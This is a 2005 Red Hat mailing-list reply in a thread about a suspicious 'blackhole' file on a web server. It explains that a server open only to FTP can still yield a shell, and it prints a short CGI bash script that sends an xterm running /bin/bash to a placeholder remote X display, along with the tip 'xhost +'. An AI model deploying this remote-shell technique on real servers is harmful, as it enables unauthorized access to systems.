Blackhole
Tobias Speckbacher
TSpeckbacher at quova.com
Mon Apr 11 19:16:13 UTC 2005
> -----Original Message-----
> From: redhat-list-bounces at redhat.com [mailto:redhat-list-
> bounces at redhat.com] On Behalf Of Chris Kenward
> Sent: Monday, April 11, 2005 8:15 AM
> To: 'General Red Hat Linux discussion list'
> Subject: RE: Blackhole
>
> Hi there, Tom
>
> > Is it possible that you have some shell accounts on your system
> > and that one of your users is trying to run this? The C code by
> > itself won't harm anything, and from what you say, it does not
> > appear to have been compiled. Perhaps just upgrading to the newest
> > apache will fix? Looking at the links provided below seem to
> > indicate that the executable must be run, to try to break the apache
> > server through the listed port. I've seen this attempt many times
> > on my machine, & AFAIK, it's never been successful.
>
> I don't think anyone local to the machine would do something like that
-
> we
> only allow FTP access to the server and no users have telnet or SSH
> access.
Shell access is not necessary, the web server itself essentially can
serve as a shell. Easy enough to write a cgi script to execute all the
commands necessary.
Hell, even getting a shell is trivial:
First we grab an xterm binary from a compatible system, and drop it
wherever we have access to, set permissions yada yada yada. Unless of
course the admin was kind enough to install it for us, which I have seen
plenty of times.
We will name the following script xterm.cgi or whatever extensions you
have set to execute and drop it into my web sites cgi-bin directory.
Of course this will not work if the web server is properly firewalled,
which in my experience they hardly ever are.
#!/bin/bash
export DISPLAY=xxx.xxx.xxx.xxx:0.0
/tmp/xterm -e /bin/bash
If you try this don't forget to add the host to your X-Servers acl or
simply run xhost+.
A web server will let you just about do anything you want ...
-Tobias
>
> The Apache web server is latest version from the RHN (2.0?)
>
> I've taken the bull by the proverbials and deleted the file called
> "blackhole". Can't find anything else suspicious and looking through
the
> various ports that are active doesn't really show anything suspicious.
>
> Whew?
>
> Regards
> Chris
>
>
> --
> redhat-list mailing list
> unsubscribe mailto:redhat-list-request at redhat.com?subject=unsubscribe
> https://www.redhat.com/mailman/listinfo/redhat-list
More information about the redhat-list
mailing list